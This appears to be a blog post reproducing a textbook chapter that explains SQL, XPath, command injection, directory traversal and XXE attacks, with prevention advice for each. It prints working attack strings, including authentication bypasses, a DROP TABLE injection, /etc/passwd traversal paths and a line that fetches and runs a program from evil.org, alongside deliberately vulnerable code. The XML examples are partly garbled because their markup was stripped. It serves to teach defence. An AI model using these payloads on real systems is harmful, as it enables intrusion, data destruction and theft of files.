Monday, April 25, 2011

HOW INJECTION ATTACKS WORK

-HOW INJECTION ATTACKS WORK ??
Injection attacks are based on a single problem that persists in many technologies: namely,
no strict separation exists between program instructions and user data (also referred to as
user input). This problem allows for attackers to sneak program instructions into places
where the developer expected only benign data. By sneaking in program instructions, the
attacker can instruct the program to perform actions of the attacker’s choosing.
To perform an injection attack, the attacker attempts to place data that is interpreted
as instructions in common inputs. A successful attack requires three elements:
• Identifying the technology that the web application is running. Injection attacks
are heavily dependent on the programming language or hardware possessing
the problem. This can be accomplished with some reconnaissance or by simply
trying all common injection attacks. To identify technologies, an attacker can
look at web page footers, view error pages, view page source code, and use
tools such as nessus, nmap, THC-amap, and others.
• Identifying all possible user inputs. Some user input is obvious, such as HTML
forms. However, an attacker can interact with a web application in many ways.
An attacker can manipulate hidden HTML form inputs, HTTP headers (such as
cookies), and even backend Asynchronous JavaScript and XML (AJAX) requests
that are not seen by end users. Essentially all data within every HTTP GET and
POST should be considered user input. To help identify all possible user inputs to
a web application, you can use a web proxy such as WebScarab, Paros, or Burp.
• Finding the user input that is susceptible to the attack. This may seem difficult,
but web application error pages sometimes provide great insight into what user
input is vulnerable.
The easiest way to explain injection attacks is through example. The following SQL
injection example provides a solid overview of an injection attack, while the other
examples simply focus on the problem with the specific language or hardware.
Attackers use SQL injection to do anything from circumvent authentication to gain
complete control of databases on a remote server.
SQL, the Structured Query Language, is the de facto standard for accessing databases.
Most web applications today use an SQL database to store persistent data for the
application. It is likely that any web application you are testing uses an SQL database in
the backend. Like many languages, SQL syntax is a mixture of database instructions and
user data. If a developer is not careful, the user data could be interpreted as instructions,
and a remote user could perform arbitrary instructions on the database.
Consider, for example, a simple web application that requires user authentication.
Assume that this application presents a login screen asking for a username and password.
The user sends the username and password over some HTTP request, whereby the web
application checks the username and password against a list of acceptable usernames
and passwords. Such a list is usually a database table within an SQL database.
A developer can create this list using the following SQL statement:
CREATE TABLE user_table (
id INTEGER PRIMARY KEY,
username VARCHAR(32),
password VARCHAR(41)
);
This SQL code creates a table with three columns. The first column stores an ID that
will be used to reference an authenticated user in the database. The second column holds
the username, which is arbitrarily assumed to be 32 characters at most. The third column
holds the password column, which contains a hash of the user’s password, because it is
bad practice to store user passwords in their original form.
We will use the SQL function PASSWORD() to hash the password. In MySQL, the
output of PASSWORD() is 41 characters.
Authenticating a user is as simple as comparing the user’s input (username and
password) with each row in the table. If a row matches both the username and password
provided, then the user will be authenticated as being the user with the corresponding
ID. Suppose that the user sent the username lonelynerd15 and password mypassword. The
user ID can be looked up:
SELECT id FROM user_table WHERE username='lonelynerd15' AND
password=PASSWORD('mypassword')
If the user was in the database table, this SQL command would return the ID
associated with the user, implying that the user is authenticated. Otherwise, this SQL
command would return nothing, implying that the user is not authenticated.
Automating the login seems simple enough. Consider the following Java snippet
that receives the username and password from a user and authenticates the user via an
SQL query:
String username = req.getParameter("username");
String password = req.getParameter("password");
String query = "SELECT id FROM user_table WHERE " +
"username = '" + username + "' AND " +
"password = PASSWORD('" + password + "')";
ResultSet rs = stmt.executeQuery(query);
int id = -1; // -1 implies that the user is unauthenticated.
while (rs.next()) {
id = rs.getInt("id");
}
The first two lines grab the user input from the HTTP request. The next line constructs
the SQL query. The query is executed, and the result is gathered in the while() loop. If
a username and password pair match, the correct ID is returned. Otherwise, the id stays
-1, which implies the user is not authenticated.
If the username and password pair match, then the user is authenticated. Otherwise,
the user will not be authenticated, right?
Wrong! There is nothing stopping an attacker from injecting SQL statements in the
username or password fields to change the SQL query.
Let’s re-examine the SQL query string:
String query = "SELECT id FROM user_table WHERE " +
"username = '" + username + "' AND " +
"password = PASSWORD('" + password + "')";
The code expects the username and password strings to be data. However, an
attacker can input any characters he or she pleases. Imagine if an attacker entered the
username ’OR 1=1 -- and password x; then the query string would look like this:
SELECT id FROM user_table WHERE username = '' OR 1=1 -- ' AND password
= PASSWORD('x')
The double dash (--) tells the SQL parser that everything to the right is a comment,
so the query string is equivalent to this:
SELECT id FROM user_table WHERE username = '' OR 1=1
The SELECT statement now acts much differently, because it will now return IDs
where the username is a zero length string ('') or where 1=1; but 1=1 is always true! So
this statement will return all the IDs from user_table.
In this case, the attacker placed SQL instructions ('OR 1=1 --) in the username
field instead of data.
Choosing Appropriate SQL Injection Code
To inject SQL instructions successfully, the attacker must turn the developer’s existing
SQL instructions into a valid SQL statement. For instance, single quotes must be closed.
Blindly doing so is a little difficult, and generally queries like these work:
• ' OR 1=1 --
• ') OR 1=1 --
Also, many web applications provide extensive error reporting and debugging
information. For example, attempting ' OR 1=1 -- blindly in a web application often
gives you an educational error message like this:
Error executing query: You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right
syntax to use near 'SELECT (title, body) FROM blog_table WHERE
cat='OR 1=1' at line 1
The particular error message shows the whole SQL statement. In this case, it appears
that the SQL database was expecting an integer, not a string, so the injection string
OR 1=1 --, without the proceeding apostrophe would work.
With most SQL databases, an attacker can place many SQL statements on a single line
as long as the syntax is correct for each statement. For the following code, we showed
that setting username to ' OR 1=1 and password to x returns that last user:
String query = "SELECT id FROM user_table WHERE " +
"username = '" + username + "' AND " +
"password = PASSWORD('" + password + "')";
However, the attacker could inject other queries. For example, setting the username to
this,
' OR 1=1; DROP TABLE user_table; --
would change this query to this,
SELECT id FROM user_table WHERE username='' OR 1=1; DROP TABLE
user_table; -- ' AND password = PASSWORD('x');
which is equivalent to this:
SELECT id FROM user_table WHERE username='' OR 1=1; DROP TABLE
user_table;
This statement will perform the syntactically correct SELECT statement and erase the
user_table with the SQL DROP command.
Injection attacks are not necessary blind attacks. Many web applications are developed
with open-source tools. To make injection attacks more successful, download free or
evaluation copies of products and set up your own test system. Once you have found an
error in your test system, it is highly probable that the same issue will exist on all web
applications using that tool.
Preventing SQL Injection
The core problems are that strings are not properly escaped or data types are not
constrained. To prevent SQL injection, first constrain data types (that is, if the input
should always be an integer value, then treat it as an integer for all instances in which it
is referenced). Second, escape user input. Simply escaping the apostrophe (') to backslash-
apostrophe (\') and escaping backslash (\) to double backslash (\\) would have
prevented the example attack. However, escaping can be much more complex. Thus, we
recommend finding the appropriate escape routine for the database you are using.
By far the best solution is using prepared statements. Prepared statements were
originally designed to optimize database connectors. At a very low level, prepared
statements strictly separate user data from SQL instructions. Thus, when using prepared
statements properly, user input will never be interpreted as SQL instructions.
When sensitive data is stored in XML rather than an SQL database, Attackers can use
XPath injection to do anything from circumventing authentication to reading and writing
data on the remote system.
XML documents are getting so complex that they are no longer human readable—
which was one of the original advantages of XML. To sort through complex XML
documents, developers created the XPath language. XPath is a query language for XML
documents, much like SQL is a query language for databases. Like SQL, XPath also has
injection issues.
Consider the following XML document identifying IDs, usernames, and passwords
for a web application:
1
admin
xpathr00lz
2
testuser
test123
3
lonelyhacker15
mypassword
A developer could perform an authentication routine with the following Java code:
String username = req.getParameter("username");
String password = req.getParameter("password");
XPathFactory factory = XPathFactory.newInstance();
XPath xpath = factory.newXPath();
File file = new File("/usr/webappdata/users.xml");
InputSource src = new InputSource(new FileInputStream(file));
XPathExpression expr = xpath.compile("//users[username/text()=' " +
username + " ' and password/text()=' "+ password +" ']/id/text()");
String id = expr.evaluate(src);
This code loads up the XML document and queries for the ID associated with the
provided username and password. Assuming the username was admin and the
password was xpathr00lz, the XPath query would be this:
//users[username/text()='admin' and password/text()='xpathr00lz']/id/
text()
Notice that the user input is not escaped in the Java code, so an attacker can place any
data or XPath instructions in this XPath query, such as setting the password to ' or '1'='1;
the query would then be this:
//users[username/text()='admin' and password/text()='' or '1'='1' ]/id/
text()
This query would find the ID where the username is admin and the password is
either null (which is high unlikely) or 1=1 (which is always true). Thus, injecting ' or
'1'='1 returns the ID for the administrator without the attacker knowing the
administrator’s password.
Note that XPath is a subset of a larger XML querying language called XQuery. Like
XPath and SQL, XQuery possess identical injection problems. With a little knowledge of
XQuery syntax and after reading this chapter, you should have sufficient knowledge to
be able to test for XQuery injections, too.
Preventing XPath Injection
The process for fixing XPath injection is nearly identical to that for fixing SQL injections.
Namely, constrain data types and escape strings. In this case, you must escape with
HTML entity encodings. For example, an apostrophe is escaped to '. As noted
earlier, use the appropriate escape routine accompanying the XPath library you are
using, as XPath implementations differ.
A successful command injection attack gives the attacker complete control of the
remote system.
When user input is used as part of a system command, an attack may be able to inject
system commands into the user input. This can happen in any programming language;
however, it is very common in Perl, PHP, and shell based CGI. It is less common in Java,
Phython, and C#. Consider the following PHP code snippet:
$email_subject = "some subject";
if ( isset($_GET{'email'})) {
system("mail " + $_GET{'email'}) + " -s '" + $email_subject +
"' < /tmp/email_body", $return_val);
}
?>
The user sends his or her e-mail address in the email parameter, and that user input
is placed directly into a system command. Like SQL injection, the goal of the attacker
is to inject a shell command into the email parameter while ensuring that the code before
and after the email parameter is syntactically correct. Consider the system() call
as a puzzle. The outer puzzle pieces are in place, and the attacker must find a puzzle
piece in the middle to finish it off:
mail [MISSING PUZZLE PIECE] –s 'some subject' < /tmp/email_body
The puzzle piece needs to ensure that the mail command runs and exits properly. For
example, mail --help will run and exit properly. Then the attacker could add additional
shell commands by separating the commands with semicolons (;). Dealing with the puzzle
piece on the other side is as simple as commenting it out with the shell comment symbol (#).
Thus, a useful puzzle piece for the email parameter might be this:
--help; wget http://evil.org/attack_program; ./attack_program #
Adding this puzzle piece to the puzzle creates the following shell command:
mail --help; wget http://evil.org/attack_program;
./attack_program # s 'some subject' < /tmp/email_body
This is equivalent to this:
mail --help; wget http://evil.org/attack_program; ./attack_program
This runs mail --help and then downloads attack_program from evil.org and
executes it, allowing the attacker to perform arbitrary commands on the vulnerable
web site.
Preventing Command Injection
Preventing command injection is similar to preventing SQL injection. The developer
must escape the user input appropriately before running a command with that input. It
may seem like escaping semicolon (;) to backslash-semicolon (\;) would fix the problem.
However, the attacker could use double-ampersand (&&) or possibly double-bar (||)
instead of the semicolon. The escaping routine is heavily dependent on the shell executing
the command. So developers should use an escape routine for the shell command rather
than creating their own routine.
Directory Traversal Attacks :
Attackers use directory traversal attacks to read arbitrary files on web servers, such
as SSL private keys and password files.
Some web applications open files based on HTTP parameters (user input). Consider
this simple PHP application that displays a file in many languages:
$language = "main-en";
if (is_set($_GET['language']))
$language = $_GET['language'];
include("/usr/local/webapp/static_files/" . $language . ".html");
?>
Assume that this PHP page is accessible through http://foo.com/webapp/static.
php?language=main-en; an attacker can read arbitrary files from the web server by
inserting some string to make the include function point to a different file. For instance,
if an attacker made these GET requests,
http://foo.com/webapp/static.php?language=../../../../etc/passwd%00
the include function would open this file:
/usr/local/webapp/static_files/../../../../etc/passwd
This file is simply
/etc/passwd
Thus, the GET request would return the contents of /etc/passwd on the server. Note that
the null byte (%00) ends the string, so .html would not be concatenated to the end of the
filename.
This type of attack is called a directory traversal attack, and it has plagued many web
servers for some time, because attackers would URL encode the ../ segments in various
ways, such as these:
• %2e%2e%2f
• %2e%2e/
• ..%2f
• .%2e/
Directory Traversal Attacks
Today, some web application frameworks automatically protect against directory
traversal attacks. For example, PHP has a setting called magic_quotes_gpc, which is on
by default. This setting “magically” escapes suspicious characters in GETs, POSTs, and
cookies with a backslash. Thus, the character / is escaped to \/, which stops this attack.
Other web application frameworks do not have general protection mechanisms, and it is
up to the developer to protect against these problems.
To protect your application from directory traversal attacks, whitelist the acceptable
files—that is, deny all user input except for a small subset like this:
$languages = array('main-en','main-fr','main-ru');
$language = $languages[1];
if (is_set($_GET['language']))
$tmp = $_GET['language'];
if (array_search($tmp, $languages))
$language = $tmp;
include("/usr/local/webapp/static_files/" . $language . ".html");
?>
XXE (XML eXternal Entity) Attacks
Like directory traversal attacks, XML external entity attacks allow the attacker to
read arbitrary files on the server from SSL private keys to password files.
A little known “feature” of XML is external entities, whereby developers can define
their own XML entities. For example, this sample XML-based Really Simple Syndication
(RSS) document defines the &author; entity and uses it throughout the page:
]>
&author;
You can also define entities that read system files. For example, when an XML parser
reads the following RSS document, the parser will replace &passwd; or &passwd2;
with /etc/passwd:
]>
My attack RSS feed showing /etc/passwd
this is file:/etc/passwd: &passwd; and this is
ile:///etc/passwd: &passwd;
/etc/passwd
file:/etc/passwd: &passwd; file:///etc/passwd:
passwd;
http://example.com
To exploit this attack, the attacker simply places this RSS file on his or her web site
and adds this attack RSS feed to some online RSS aggregator. If the RSS aggregator is
vulnerable, the attacker will see the contents of /etc/passwd on the vulnerable aggregator
while viewing the attack RSS feed.
By simply uploading an XML file, the XML file can even send the files back to the
attacker. This is great for attacking backend systems where the attacker will never see the
output of the XML file. Create one entity to load up a sensitive file on the server (say
c:\boot.ini) and create another entity loading an URL to the attacker’s site with the
former entity within the request, as so:
]>
&sendbootini;
Obviously, this attack can lead to arbitrary file disclosure on the vulnerable web
server. It is not limited to RSS feeds. This attack can be mounted on all web applications
that accept XML documents and parse the document.
It’s amazing how many web applications integrate RSS feeds as an add-on feature.
These applications tend to add this feature as an afterthought and are vulnerable to this
attack.
Preventing XXE Attacks
To protect against XXE attacks, simply instruct the XML parser you use to prohibit
external entities. Prohibiting external entities varies depending on the XML parser used.
For example, JAXP and Xerces do not resolve entities by default, while developers must
explicitly turn off entity expansion in LibXML using expand_entities(0);.